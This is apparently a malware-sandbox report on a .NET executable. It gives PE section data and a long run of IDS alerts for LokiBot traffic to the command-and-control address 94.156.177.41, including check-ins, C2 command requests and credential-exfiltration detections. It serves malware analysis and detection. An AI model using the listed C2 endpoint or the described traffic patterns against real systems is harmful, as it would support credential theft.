                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x941700x4f.text
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x59c.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92ed40x70.text
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x20000x921c80x92200b315e9fc71ba30c84d0ac2ce4b879081False0.9096182634730539data7.731637245415364IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rsrc0x960000x59c0x600b7b7459aab57886443e950902dd615f9False0.41796875data4.064003262536425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x980000xc0x2002648a2a48de7e8802887965b9cb2a35cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_VERSION0x960900x30cdata0.4371794871794872
                                    RT_MANIFEST0x963ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                    DLLImport
                                    mscoree.dll_CorExeMain
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-11-28T13:51:55.400275+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549824TCP
                                    2024-11-28T13:52:04.479690+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970894.156.177.4180TCP
                                    2024-11-28T13:52:04.479690+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970894.156.177.4180TCP
                                    2024-11-28T13:52:04.479690+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970894.156.177.4180TCP
                                    2024-11-28T13:52:05.944288+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970894.156.177.4180TCP
                                    2024-11-28T13:52:06.410511+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54970994.156.177.4180TCP
                                    2024-11-28T13:52:06.410511+01002025381ET MALWARE LokiBot Checkin1192.168.2.54970994.156.177.4180TCP
                                    2024-11-28T13:52:06.410511+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54970994.156.177.4180TCP
                                    2024-11-28T13:52:07.903841+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.54970994.156.177.4180TCP
                                    2024-11-28T13:52:08.237689+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971194.156.177.4180TCP
                                    2024-11-28T13:52:08.237689+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971194.156.177.4180TCP
                                    2024-11-28T13:52:08.237689+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971194.156.177.4180TCP
                                    2024-11-28T13:52:09.514500+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971194.156.177.4180TCP
                                    2024-11-28T13:52:09.634906+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549711TCP
                                    2024-11-28T13:52:10.072483+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971294.156.177.4180TCP
                                    2024-11-28T13:52:10.072483+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971294.156.177.4180TCP
                                    2024-11-28T13:52:10.072483+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971294.156.177.4180TCP
                                    2024-11-28T13:52:11.594715+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971294.156.177.4180TCP
                                    2024-11-28T13:52:11.714786+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549712TCP
                                    2024-11-28T13:52:11.973667+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971394.156.177.4180TCP
                                    2024-11-28T13:52:11.973667+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971394.156.177.4180TCP
                                    2024-11-28T13:52:11.973667+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971394.156.177.4180TCP
                                    2024-11-28T13:52:13.292548+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971394.156.177.4180TCP
                                    2024-11-28T13:52:13.412589+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549713TCP
                                    2024-11-28T13:52:13.689499+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971494.156.177.4180TCP
                                    2024-11-28T13:52:13.689499+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971494.156.177.4180TCP
                                    2024-11-28T13:52:13.689499+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971494.156.177.4180TCP
                                    2024-11-28T13:52:15.014454+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971494.156.177.4180TCP
                                    2024-11-28T13:52:15.135212+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549714TCP
                                    2024-11-28T13:52:15.393770+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971594.156.177.4180TCP
                                    2024-11-28T13:52:15.393770+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971594.156.177.4180TCP
                                    2024-11-28T13:52:15.393770+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971594.156.177.4180TCP
                                    2024-11-28T13:52:16.819103+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971594.156.177.4180TCP
                                    2024-11-28T13:52:16.939118+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549715TCP
                                    2024-11-28T13:52:17.219155+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54971894.156.177.4180TCP
                                    2024-11-28T13:52:17.219155+01002025381ET MALWARE LokiBot Checkin1192.168.2.54971894.156.177.4180TCP
                                    2024-11-28T13:52:17.219155+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54971894.156.177.4180TCP
                                    2024-11-28T13:52:18.734775+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54971894.156.177.4180TCP
                                    2024-11-28T13:52:18.855201+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549718TCP
                                    2024-11-28T13:52:19.113785+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972194.156.177.4180TCP
                                    2024-11-28T13:52:19.113785+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972194.156.177.4180TCP
                                    2024-11-28T13:52:19.113785+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972194.156.177.4180TCP
                                    2024-11-28T13:52:20.433012+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972194.156.177.4180TCP
                                    2024-11-28T13:52:20.553024+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549721TCP
                                    2024-11-28T13:52:20.813749+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972494.156.177.4180TCP
                                    2024-11-28T13:52:20.813749+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972494.156.177.4180TCP
                                    2024-11-28T13:52:20.813749+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972494.156.177.4180TCP
                                    2024-11-28T13:52:22.280016+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972494.156.177.4180TCP
                                    2024-11-28T13:52:22.400000+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549724TCP
                                    2024-11-28T13:52:22.659042+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972694.156.177.4180TCP
                                    2024-11-28T13:52:22.659042+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972694.156.177.4180TCP
                                    2024-11-28T13:52:22.659042+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972694.156.177.4180TCP
                                    2024-11-28T13:52:24.172204+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972694.156.177.4180TCP
                                    2024-11-28T13:52:24.292204+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549726TCP
                                    2024-11-28T13:52:24.549789+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54972794.156.177.4180TCP
                                    2024-11-28T13:52:24.549789+01002025381ET MALWARE LokiBot Checkin1192.168.2.54972794.156.177.4180TCP
                                    2024-11-28T13:52:24.549789+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54972794.156.177.4180TCP
                                    2024-11-28T13:52:25.972126+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54972794.156.177.4180TCP
                                    2024-11-28T13:52:26.096508+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549727TCP
                                    2024-11-28T13:52:26.365633+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973394.156.177.4180TCP
                                    2024-11-28T13:52:26.365633+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973394.156.177.4180TCP
                                    2024-11-28T13:52:26.365633+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973394.156.177.4180TCP
                                    2024-11-28T13:52:27.874307+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973394.156.177.4180TCP
                                    2024-11-28T13:52:27.994452+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549733TCP
                                    2024-11-28T13:52:28.268944+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54973994.156.177.4180TCP
                                    2024-11-28T13:52:28.268944+01002025381ET MALWARE LokiBot Checkin1192.168.2.54973994.156.177.4180TCP
                                    2024-11-28T13:52:28.268944+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54973994.156.177.4180TCP
                                    2024-11-28T13:52:29.593699+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54973994.156.177.4180TCP
                                    2024-11-28T13:52:29.713774+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549739TCP
                                    2024-11-28T13:52:29.992184+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54974594.156.177.4180TCP
                                    2024-11-28T13:52:29.992184+01002025381ET MALWARE LokiBot Checkin1192.168.2.54974594.156.177.4180TCP
                                    2024-11-28T13:52:29.992184+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54974594.156.177.4180TCP
                                    2024-11-28T13:52:31.306295+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54974594.156.177.4180TCP
                                    2024-11-28T13:52:31.448629+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549745TCP
                                    2024-11-28T13:52:31.691657+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975094.156.177.4180TCP
                                    2024-11-28T13:52:31.691657+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975094.156.177.4180TCP
                                    2024-11-28T13:52:31.691657+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975094.156.177.4180TCP
                                    2024-11-28T13:52:33.012667+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975094.156.177.4180TCP
                                    2024-11-28T13:52:33.133068+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549750TCP
                                    2024-11-28T13:52:33.568487+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975194.156.177.4180TCP
                                    2024-11-28T13:52:33.568487+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975194.156.177.4180TCP
                                    2024-11-28T13:52:33.568487+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975194.156.177.4180TCP
                                    2024-11-28T13:52:35.032116+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975194.156.177.4180TCP
                                    2024-11-28T13:52:35.152257+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549751TCP
                                    2024-11-28T13:52:35.425401+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54975794.156.177.4180TCP
                                    2024-11-28T13:52:35.425401+01002025381ET MALWARE LokiBot Checkin1192.168.2.54975794.156.177.4180TCP
                                    2024-11-28T13:52:35.425401+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54975794.156.177.4180TCP
                                    2024-11-28T13:52:36.795234+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54975794.156.177.4180TCP
                                    2024-11-28T13:52:36.915264+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549757TCP
                                    2024-11-28T13:52:37.177766+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976294.156.177.4180TCP
                                    2024-11-28T13:52:37.177766+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976294.156.177.4180TCP
                                    2024-11-28T13:52:37.177766+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976294.156.177.4180TCP
                                    2024-11-28T13:52:38.452387+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54976294.156.177.4180TCP
                                    2024-11-28T13:52:38.578089+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549762TCP
                                    2024-11-28T13:52:38.836045+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54976894.156.177.4180TCP
                                    2024-11-28T13:52:38.836045+01002025381ET MALWARE LokiBot Checkin1192.168.2.54976894.156.177.4180TCP
                                    2024-11-28T13:52:38.836045+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54976894.156.177.4180TCP
                                    2024-11-28T13:52:40.154060+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54976894.156.177.4180TCP
                                    2024-11-28T13:52:40.274183+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549768TCP
                                    2024-11-28T13:52:40.534388+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977194.156.177.4180TCP
                                    2024-11-28T13:52:40.534388+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977194.156.177.4180TCP
                                    2024-11-28T13:52:40.534388+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977194.156.177.4180TCP
                                    2024-11-28T13:52:41.957950+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977194.156.177.4180TCP
                                    2024-11-28T13:52:42.077928+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549771TCP
                                    2024-11-28T13:52:42.351772+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54977594.156.177.4180TCP
                                    2024-11-28T13:52:42.351772+01002025381ET MALWARE LokiBot Checkin1192.168.2.54977594.156.177.4180TCP
                                    2024-11-28T13:52:42.351772+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54977594.156.177.4180TCP
                                    2024-11-28T13:52:43.776505+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54977594.156.177.4180TCP
                                    2024-11-28T13:52:43.903449+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549775TCP
                                    2024-11-28T13:52:44.168555+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54978194.156.177.4180TCP
                                    2024-11-28T13:52:44.168555+01002025381ET MALWARE LokiBot Checkin1192.168.2.54978194.156.177.4180TCP
                                    2024-11-28T13:52:44.168555+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54978194.156.177.4180TCP
                                    2024-11-28T13:52:45.678418+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54978194.156.177.4180TCP
                                    2024-11-28T13:52:45.798995+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549781TCP
                                    2024-11-28T13:52:46.067495+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54978594.156.177.4180TCP
                                    2024-11-28T13:52:46.067495+01002025381ET MALWARE LokiBot Checkin1192.168.2.54978594.156.177.4180TCP
                                    2024-11-28T13:52:46.067495+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54978594.156.177.4180TCP
                                    2024-11-28T13:52:47.491806+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54978594.156.177.4180TCP
                                    2024-11-28T13:52:47.611903+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549785TCP
                                    2024-11-28T13:52:48.007586+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979194.156.177.4180TCP
                                    2024-11-28T13:52:48.007586+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979194.156.177.4180TCP
                                    2024-11-28T13:52:48.007586+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979194.156.177.4180TCP
                                    2024-11-28T13:52:49.519282+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979194.156.177.4180TCP
                                    2024-11-28T13:52:49.639320+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549791TCP
                                    2024-11-28T13:52:49.915881+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54979794.156.177.4180TCP
                                    2024-11-28T13:52:49.915881+01002025381ET MALWARE LokiBot Checkin1192.168.2.54979794.156.177.4180TCP
                                    2024-11-28T13:52:49.915881+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54979794.156.177.4180TCP
                                    2024-11-28T13:52:51.273383+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54979794.156.177.4180TCP
                                    2024-11-28T13:52:51.399558+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549797TCP
                                    2024-11-28T13:52:51.665645+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980194.156.177.4180TCP
                                    2024-11-28T13:52:51.665645+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980194.156.177.4180TCP
                                    2024-11-28T13:52:51.665645+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980194.156.177.4180TCP
                                    2024-11-28T13:52:53.173277+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980194.156.177.4180TCP
                                    2024-11-28T13:52:53.296816+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549801TCP
                                    2024-11-28T13:52:53.728329+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54980694.156.177.4180TCP
                                    2024-11-28T13:52:53.728329+01002025381ET MALWARE LokiBot Checkin1192.168.2.54980694.156.177.4180TCP
                                    2024-11-28T13:52:53.728329+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54980694.156.177.4180TCP
                                    2024-11-28T13:52:55.119928+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54980694.156.177.4180TCP
                                    2024-11-28T13:52:55.240089+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549806TCP
                                    2024-11-28T13:52:55.529063+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981194.156.177.4180TCP
                                    2024-11-28T13:52:55.529063+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981194.156.177.4180TCP
                                    2024-11-28T13:52:55.529063+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981194.156.177.4180TCP
                                    2024-11-28T13:52:57.817541+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981194.156.177.4180TCP
                                    2024-11-28T13:52:57.940552+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549811TCP
                                    2024-11-28T13:52:58.217591+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54981894.156.177.4180TCP
                                    2024-11-28T13:52:58.217591+01002025381ET MALWARE LokiBot Checkin1192.168.2.54981894.156.177.4180TCP
                                    2024-11-28T13:52:58.217591+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54981894.156.177.4180TCP
                                    2024-11-28T13:52:59.638447+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54981894.156.177.4180TCP
                                    2024-11-28T13:52:59.760272+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549818TCP
                                    2024-11-28T13:53:00.334231+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982494.156.177.4180TCP
                                    2024-11-28T13:53:00.334231+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982494.156.177.4180TCP
                                    2024-11-28T13:53:00.334231+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982494.156.177.4180TCP
                                    2024-11-28T13:53:01.635518+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982494.156.177.4180TCP
                                    2024-11-28T13:53:02.019879+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54982994.156.177.4180TCP
                                    2024-11-28T13:53:02.019879+01002025381ET MALWARE LokiBot Checkin1192.168.2.54982994.156.177.4180TCP
                                    2024-11-28T13:53:02.019879+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54982994.156.177.4180TCP
                                    2024-11-28T13:53:03.488071+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54982994.156.177.4180TCP
                                    2024-11-28T13:53:03.610341+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549829TCP
                                    2024-11-28T13:53:03.878356+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54983394.156.177.4180TCP
                                    2024-11-28T13:53:03.878356+01002025381ET MALWARE LokiBot Checkin1192.168.2.54983394.156.177.4180TCP
                                    2024-11-28T13:53:03.878356+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54983394.156.177.4180TCP
                                    2024-11-28T13:53:05.350722+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54983394.156.177.4180TCP
                                    2024-11-28T13:53:05.477095+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549833TCP
                                    2024-11-28T13:53:05.737923+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54983794.156.177.4180TCP
                                    2024-11-28T13:53:05.737923+01002025381ET MALWARE LokiBot Checkin1192.168.2.54983794.156.177.4180TCP
                                    2024-11-28T13:53:05.737923+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54983794.156.177.4180TCP
                                    2024-11-28T13:53:07.207826+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54983794.156.177.4180TCP
                                    2024-11-28T13:53:07.328140+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549837TCP
                                    2024-11-28T13:53:07.602577+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984094.156.177.4180TCP
                                    2024-11-28T13:53:07.602577+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984094.156.177.4180TCP
                                    2024-11-28T13:53:07.602577+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984094.156.177.4180TCP
                                    2024-11-28T13:53:09.114132+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984094.156.177.4180TCP
                                    2024-11-28T13:53:09.234121+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549840TCP
                                    2024-11-28T13:53:09.650403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54984594.156.177.4180TCP
                                    2024-11-28T13:53:09.650403+01002025381ET MALWARE LokiBot Checkin1192.168.2.54984594.156.177.4180TCP
                                    2024-11-28T13:53:09.650403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54984594.156.177.4180TCP
                                    2024-11-28T13:53:11.552901+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54984594.156.177.4180TCP
                                    2024-11-28T13:53:11.676387+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549845TCP
                                    2024-11-28T13:53:11.943752+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985194.156.177.4180TCP
                                    2024-11-28T13:53:11.943752+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985194.156.177.4180TCP
                                    2024-11-28T13:53:11.943752+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985194.156.177.4180TCP
                                    2024-11-28T13:53:13.408228+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985194.156.177.4180TCP
                                    2024-11-28T13:53:13.531949+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549851TCP
                                    2024-11-28T13:53:13.787378+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54985794.156.177.4180TCP
                                    2024-11-28T13:53:13.787378+01002025381ET MALWARE LokiBot Checkin1192.168.2.54985794.156.177.4180TCP
                                    2024-11-28T13:53:13.787378+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54985794.156.177.4180TCP
                                    2024-11-28T13:53:15.303148+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54985794.156.177.4180TCP
                                    2024-11-28T13:53:15.423126+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549857TCP
                                    2024-11-28T13:53:15.696851+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986294.156.177.4180TCP
                                    2024-11-28T13:53:15.696851+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986294.156.177.4180TCP
                                    2024-11-28T13:53:15.696851+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986294.156.177.4180TCP
                                    2024-11-28T13:53:16.968396+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986294.156.177.4180TCP
                                    2024-11-28T13:53:17.088676+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549862TCP
                                    2024-11-28T13:53:17.383644+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54986794.156.177.4180TCP
                                    2024-11-28T13:53:17.383644+01002025381ET MALWARE LokiBot Checkin1192.168.2.54986794.156.177.4180TCP
                                    2024-11-28T13:53:17.383644+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54986794.156.177.4180TCP
                                    2024-11-28T13:53:18.852419+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54986794.156.177.4180TCP
                                    2024-11-28T13:53:18.978807+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549867TCP
                                    2024-11-28T13:53:19.396128+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987194.156.177.4180TCP
                                    2024-11-28T13:53:19.396128+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987194.156.177.4180TCP
                                    2024-11-28T13:53:19.396128+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987194.156.177.4180TCP
                                    2024-11-28T13:53:20.910013+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987194.156.177.4180TCP
                                    2024-11-28T13:53:21.030551+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549871TCP
                                    2024-11-28T13:53:21.301001+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54987794.156.177.4180TCP
                                    2024-11-28T13:53:21.301001+01002025381ET MALWARE LokiBot Checkin1192.168.2.54987794.156.177.4180TCP
                                    2024-11-28T13:53:21.301001+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54987794.156.177.4180TCP
                                    2024-11-28T13:53:22.780609+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54987794.156.177.4180TCP
                                    2024-11-28T13:53:22.903350+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.549877TCP
                                    2024-11-28T13:53:23.160248+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54988294.156.177.4180TCP
                                    2024-11-28T13:53:23.160248+01002025381ET MALWARE LokiBot Checkin1192.168.2.54988294.156.177.4180TCP
